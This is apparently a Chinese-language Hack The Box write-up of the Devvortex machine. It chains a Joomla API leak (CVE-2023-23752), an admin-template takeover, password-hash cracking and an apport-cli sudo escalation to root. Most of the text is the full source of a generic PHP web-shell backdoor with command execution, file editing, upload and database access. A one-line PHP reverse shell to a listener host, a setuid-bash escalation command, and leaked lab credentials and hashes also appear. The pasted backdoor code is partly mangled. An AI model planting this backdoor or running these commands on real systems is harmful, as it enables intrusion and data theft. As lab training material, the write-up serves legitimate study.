扫描靶机
nmap -sC -sV -T4 -Pn 10.10.11.242
扫描出两个端口,还把域名扫描出来了,先打开网页看看
该网站就是第三方代理开发,然后fuzz一下子域名
wfuzz -c -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt -u "http://devvortex.htb/" -H "Host: FUZZ.devvortex.htb" --hl 7
fuzz出dev子域名,写进去hosts,然后打开
从页面上没什么信息可以拿到,扫描一下目录
可以看到扫描出了robots文本还有README.txt,可以得知是一个joomla后台,可以得知底下的目录
可以看到扫描出了robots文本还有README.txt,可以得知是一个joomla后台,可以得知底下的目录
找到了Admin后台
没有用户跟密码,先不管,可以在exploitdb里面寻找漏洞,直接用searchsploit命令
该exp的编号是CVE-2023-23752,可以在github找到,也可以在msf寻找
https://github.com/Acceis/exploit-CVE-2023-23752
在msf使用该模块:
auxiliary/scanner/http/joomla_api_improper_access_checks
直接设置RHOSTS参数,然后运行直接得到后台用户跟密码
[+] Users JSON saved to /root/.msf4/loot/20231126110334_default_10.10.11.242_joomla.users_082671.bin[+] Joomla Users============ID Super User Name Username Email Send Email Register Date Last Visit Date Group Names-- ---------- ---- -------- ----- ---------- ------------- --------------- -----------649 * lewis lewis lewis.htb 1 2023-09-25 16:44:24 2023-11-26 02:53:21 Super Users650 logan paul logan logan.htb 0 2023-09-26 19:15:42 Registered[+] Config JSON saved to /root/.msf4/loot/20231126110335_default_10.10.11.242_joomla.config_743735.bin[+] Joomla Config=============Setting Value------- -----db encryption 0db host localhostdb name joomladb password P4ntherg0t1n5r3c0n##db prefix sd4fg_db user lewisdbtype mysqli
用户是lewis,直接登陆后台
直接在System,Templates (Administrator)那里修改管理员后台页面
其实就是跟wordpress类似,这次我选择login.php,直接修改
Shell php
// A robust backdoor script made by Daniel Berliner - http://www.qsdconsulting.com/ [2011-03-15]// This code is public domain and may be used in part or in full for any legal purpose. I would still appreciate a mention though :).function isLinux($path){return (substr($path,0,1)=="/" ? true : false);}function getSlashDir($isLinux){return($isLinux ? '/' : '\');}// See if we are on Linux or Windows because the paths have to be processed differently$cwd=getcwd();$isLinux=isLinux($cwd);if(!$isLinux){$driveLetter=substr($cwd,0,1);}$slash=getSlashDir($isLinux);$parts=explode($slash,$cwd);$rootDir=($isLinux ? $slash : ($driveLetter . ':' . $slash));function cleanPath($path,$isLinux){$slash=getSlashDir($isLinux);$parts=explode($slash,$path);foreach($parts as $key=>$val) // Process '..' & '.' directories{if($val==".."){$parts[$key]="";$lastKey=$key-1;$parts[$lastKey]="";}elseif($val=="."){$parts[$key]="";}}reset($parts);$fixedPath=($isLinux ? "/" : ""); // Some PHP configs wont automatically create a variable on .= or will at least whine about it$firstPiece=true;foreach($parts as $val) // Assemble the path back together{if($val != ""){$fixedPath .= ($firstPiece ? '' : $slash) . $val;$firstPiece=false;}}if($fixedPath=="") // If we took out the entire path go to bottom level to avoid an error{$fixedPath=($isLinux ? $slash : ($driveLetter . ":" . $slash));}// Make sure there is an ending slashif(substr($fixedPath,-1)!=$slash)$fixedPath .= $slash;return $fixedPath;}if(isset($_REQUEST['chm'])){if(!$isLinux){echo "This feature only works on Linux";}else{echo (@chmod ($_REQUEST['chm'],0777) ? "Reassigned" : "Can't Reasign");}}elseif(isset($_REQUEST['phpinfo'])){phpinfo();}elseif(isset($_REQUEST['dl'])){if(@fopen($_REQUEST['dl'] . $_REQUEST['file'],'r')==true){$_REQUEST['dl'] .= $_REQUEST['file'];if(substr($_REQUEST['dl'],0,1)==$slash)$fileArr=explode($slash,$_REQUEST['dl']);header('Content-disposition: attachment; filename=' . $_REQUEST['file']);header('Content-type: application/octet-stream');readfile($_REQUEST['dl']);}else{echo $_REQUEST['dl'];}}elseif(isset($_REQUEST["gz"])){if(!$isLinux){echo "This feature only works on Linux";}else{$directory=$_REQUEST["gz"];if(substr($directory,-1)=="/")$directory=substr($directory,0,-1);$dirParts=explode($slash,$directory);$fname=$dirParts[(sizeof($dirParts)-1)];$archive=time();exec("cd $directory; tar czf $archive *");$output=@file_get_contents($directory . "/" . $archive);if(!$output)header("Content-disposition: attachment; filename=ACCESS_PROBLEM");else{header("Content-disposition: attachment; filename=$fname.tgz");echo $output;}header('Content-type: application/octet-stream');@unlink($directory . "/" . $archive);}}elseif(isset($_REQUEST['f'])){$filename=$_REQUEST['f'];$file=fopen("$filename","rb");header("Content-Type: text/plain");fpassthru($file);}elseif(isset($_REQUEST['d'])){$d=$_REQUEST['d'];echo "<pre>";if ($handle=opendir("$d")){echo "<h2>Listing of ";$conString="";if($isLinux)echo "<a href='?d=$slash'>$slash</a>";foreach(explode($slash,cleanPath($d,$isLinux)) as $val){$conString .= $val . $slash;echo "<a href='?d=$conString'>" . $val . "</a>" . ($val != "" ? $slash : '');}echo " (<a target='_blank' href='?uploadForm=1&dir=" . urlencode(cleanPath($d,$isLinux)) . "'>upload file</a>) (<a href='?d=" . urlencode(cleanPath($d,$isLinux)) . "&hldb=1'>DB interaction files in red</a>)</h2> (<a target='_blank' href='?gz=" . urlencode(cleanPath($d,$isLinux)) . "'>gzip & download folder</a>) (<a target='_blank' href='?chm=" . urlencode(cleanPath($d,$isLinux)) . "'>chmod folder to 777)</a> (these rarely work)<br />";while ($dir=readdir($handle)){if (is_dir("$d$slash$dir")){if($dir != "." && $dir !="..")$dirList[]=$dir;}else{if(isset($_REQUEST["hldb"])){$contents=file_get_contents("$d$slash$dir");if (stripos($contents,"mysql_") || stripos($contents,"mysqli_") || stripos($contents,"SELECT ")){$fileList[]=array('dir'=>$dir,'color'=>'red');}else{$fileList[]=array('dir'=>$dir,'color'=>'black');}}else{$fileList[]=array('dir'=>$dir,'color'=>'black');}}}echo "<a href='?d=$d$slash.'><font color=grey>.n</font></a>";echo "<a href='?d=$d$slash..'><font color=grey>..n</font></a>";// Some configurations throw a notice if is_array is tried with a non-existent variableif(isset($dirList))if(is_array($dirList))foreach($dirList as $dir){echo "<a href='?d=$d$slash$dir'><font color=grey>$dirn</font></a>";}if(isset($fileList))if(is_array($fileList))foreach($fileList as $dir){echo "<a href='?f=$d" . $slash . $dir['dir'] . "'><font color=" . $dir['color'] . ">" . $dir['dir'] . "</font></a>" ."|<a href='?dl=" . cleanPath($d,$isLinux) . '&file=' .$dir["dir"] . "' target='_blank'>Download</a>|" ."|<a href='?ef=" . cleanPath($d,$isLinux) . '&file=' .$dir["dir"] . "' target='_blank'>Edit</a>|" ."|<a href='?df=" . cleanPath($d,$isLinux) . '&file=' .$dir["dir"] . "' target='_blank'>Delete</a>| n";}}elseecho "opendir() failed";closedir($handle);echo "</pre>";}elseif(isset($_REQUEST['c'])){if(@ini_get('safe_mode')){echo 'Safe mode is on, the command is by default run though escapeshellcmd() and can only run programs in safe_mod_exec_dir (' . @ini_get('safe_mode_exec_dir') . ') <br />';}$USER_AGENT=strtolower(substr($_SERVER['HTTP_USER_AGENT'],0,4));$SILENT_MODE=TRUE;if ($USER_AGENT != "curl" && $USER_AGENT != "wget"){$SILENT_MODE=FALSE;echo "<h2>Command: <I>" . $_REQUEST['c'] . "</I></h2><br /><br />";}trim(exec($_REQUEST['c'],$return));foreach($return as $val){if ($SILENT_MODE){echo htmlentities($val);}else{echo '<pre>' . htmlentities($val) . '</pre>';}}}elseif(isset($_REQUEST['uploadForm']) || isset($_FILES["file_name"])){if(isset($_FILES["file_name"])){if ($_FILES["file_name"]["error"] > 0){echo "Error";}else{$target_path=$_COOKIE["uploadDir"];if(substr($target_path,-1) != "/")$target_path .= "/";$target_path=$target_path . basename($_FILES['file_name']['name']);if(move_uploaded_file($_FILES['file_name']['tmp_name'],$target_path)) {setcookie("uploadDir","");echo "The file ". basename($_FILES['file_name']['name'])." has been uploaded";}else{echo "Error copying file, likely a permission error.";}}}else{<form target="_blank" action="" method="GET"><input type="hidden" name="cc" value="1" />Submit this form before submitting file (will open in new window):<br />Upload Directory: <input type="text" name="dir" value="<?php echo $_REQUEST["dir"]; ?>"><br /><input type="submit" value="submit" /></form><br /><br /><form enctype="multipart/form-data" action="" method="post">Upload file:<input name="file_name" type="file"><input type="submit" value="Upload" /></form>}}elseif(isset($_REQUEST['cc'])){setcookie("uploadDir",$_GET["dir"]);echo "You are OK to upload the file, don't upload files to other directories before completing this upload.";}elseif(isset($_REQUEST['mquery'])){$host=$_REQUEST['host'];$usr=$_REQUEST['usr'];$passwd=$_REQUEST['passwd'];$db=$_REQUEST['db'];$mquery=$_REQUEST['mquery'];@mysql_connect($host,$usr,$passwd) or die("Connection Error: " . mysql_error());mysql_select_db($db);$result=mysql_query($mquery);if($result!=false){echo "<h2>The following query has sucessfully executed</h2>" . htmlentities($mquery) . "<br /><br />";echo "Return Results:<br />";$first=true;echo "<table border='1'>";while ($row=mysql_fetch_array($result,MYSQL_ASSOC)){if($first){echo "<tr>";foreach($row as $key=>$val){echo "<td><b>$key</b></td>";}echo "</tr>";reset($row);$first=false;}echo "<tr>";foreach($row as $val){echo "<td>$val</td>";}echo "</tr>";}echo "</table>";mysql_free_result($result);}else{echo "Query Error: " . mysql_error();}}elseif(isset($_REQUEST['df'])){$_REQUEST['df'] .= $slash . $_REQUEST['file'];if(@unlink($_REQUEST['df'])){echo "File deleted";}else{echo "Error deleting file";}}elseif(isset($_REQUEST['ef'])){<script type="text/javascript"><!--var key="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=";function encode64(inpStr){inpStr=escape(inpStr);var output="";var chr1,chr2,chr3="";var enc1,enc2,enc3,enc4="";var i=0;do {chr1=inpStr.charCodeAt(i++);chr2=inpStr.charCodeAt(i++);chr3=inpStr.charCodeAt(i++);enc1=chr1 >> 2;enc2=((chr1 & 3) << 4) | (chr2 >> 4);enc3=((chr2 & 15) << 2) | (chr3 >> 6);enc4=chr3 & 63;if (isNaN(chr2)){enc3=enc4=64;}else if (isNaN(chr3)){enc4=64;}output=output +key.charAt(enc1) +key.charAt(enc2) +key.charAt(enc3) +key.charAt(enc4);chr1=chr2=chr3=enc1=enc2=enc3=enc4="";} while (i < inpStr.length);return output;}//--></script>$_REQUEST['ef'] .= $_REQUEST['file'];if(isset($_POST["newcontent"])){$_POST["newcontent"]=urldecode(base64_decode($_POST["newcontent"]));$stream=@fopen($_REQUEST['ef'],"w");if($stream){fwrite($stream,$_POST["newcontent"]);echo "Write sucessful";}else{echo "Could not write to file";}fclose($stream);}<form action="" name="f" method="POST"><textarea wrap="off" rows="40" cols="130" name="newcontent"> echo file_get_contents($_REQUEST['ef']); </textarea><br /><input type="submit" value="I base64 encoded it myself, don't run script" /><br /><input type="submit" value="Change (requires JavaScript to work)" onclick="document.f.newcontent.value=encode64(document.f.newcontent.value);" /></form>}else{<b>Server Information:</b><br /><i>Operating System: echo PHP_OS; <br />PHP Version: echo PHP_VERSION; <a href="?phpinfo=true">View phpinfo()</a></i><br /><br /><b>Directory Traversal</b><br /><a href="?d=<?php echo getcwd(); ?>"><b>Go to current working directory</b></a><br /><a href="?d=<?php echo $rootDir; ?>"><b>Go to root directory</b></a><br /><b>Go to any directory:</b><form action="" method="GET"><input type="text" name="d" value="<?php echo $rootDir; ?>" /><input type="submit" value="Go" /></form><hr>Execute MySQL Query:<form action="" METHOD="GET"><table><tr><td>host</td><td><input type="text" name="host"value="localhost"></td></tr><tr><td>user</td><td><input type="text" name="usr" value="root"></td></tr><tr><td>password</td><td><input type="text" name="passwd"></td></tr><tr><td>database</td><td><input type="text" name="db"></td></tr><tr><td valign="top">query</td><td><textarea name="mquery" rows="6" cols="65"></textarea></td></tr><tr><td colspan="2"><input type="submit" value="Execute"></td></tr></table></form><hr><pre><form action="" METHOD="GET">Execute Shell Command (safe mode is echo (@ini_get('safe_mode') ? 'on' : 'off'); ): <input type="text" name="c"><input type="submit" value="Go"></form></pre>}// Intentionally left open to avoid output the file download function 1
修改完成直接返回登陆页面
然后直接getshell
php -r '$sock=fsockopen("10.10.14.9",443);exec("sh <&3 >&3 2>&3");'成功反弹后使用python伪终端
python3 -c "import pty;pty.spawn('/bin/bash')"
因为刚刚是直接在msf拿到了db的数据,可以直接登陆一下数据库
然后直接进到joomla里面,找到sd4fg_users的table,导出hash
mysql> select * from sd4fg_users;+-----+------------+----------+---------------------+--------------------------------------------------------------+-------+-----------+---------------------+---------------------+------------+---------------------------------------------------------------------------------------------------------------------------------------------------------+---------------+------------+--------+------+--------------+--------------+| id | name | username | email | password | block | sendEmail | registerDate | lastvisitDate | activation | params | lastResetTime | resetCount | otpKey | otep | requireReset | authProvider |+-----+------------+----------+---------------------+--------------------------------------------------------------+-------+-----------+---------------------+---------------------+------------+---------------------------------------------------------------------------------------------------------------------------------------------------------+---------------+------------+--------+------+--------------+--------------+| 649 | lewis | lewis | [email protected] | $2y$10$6V52x.SD8Xc7hNlVwUTrI.ax4BIAYuhVBMVvnYWRceBmy8XdEzm1u | 0 | 1 | 2023-09-25 16:44:24 | 2023-11-26 04:08:16 | 0 | | NULL | 0 | | | 0 | || 650 | logan paul | logan | [email protected] | $2y$10$IT4k5kmSGvHSO9d6M/1w0eYiB5Ne9XzArQRFJTGThNiy/yBtkIj12 | 0 | 0 | 2023-09-26 19:15:42 | NULL | | {"admin_style":"","admin_language":"","language":"","editor":"","timezone":"","a11y_mono":"0","a11y_contrast":"0","a11y_highlight":"0","a11y_font":"0"} | NULL | 0 | | | 0 | |+-----+------------+----------+---------------------+--------------------------------------------------------------+-------+-----------+---------------------+---------------------+------------+---------------------------------------------------------------------------------------------------------------------------------------------------------+---------------+------------+--------+------+--------------+--------------+2 rows in set (0.00 sec)
从passwd里面可以看到,普通用户是logan,直接爆破它的hash就行
这次我直接john爆破,一步到位
john --wordlist=/home/ioi/rockyou.txt hash
爆破出密码是tequieromucho,直接ssh登陆,拿到user flag
输入sudo -l查看提权路径
使用通过apport-cli进行提权,可以参考这篇文章
https://github.com/canonical/apport/commit/e5f78cc89f1f5888b6a56b785dddcb0364c48ecb
先要查看/var/crash底下有什么crash文件
选择一个,然后直接运行
sudo apport-cli -c /var/crash/_usr_bin_apport-cli.1000.crash
到底下会提示你输入东西,直接输入!id会显示root权限,还可以直接查看shadow
所以可以直接输入!chmod u+s /bin/bash,然后运行,成功提权root
原文始发于微信公众号(Jiyou too beautiful):HTB-Devvortex笔记
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论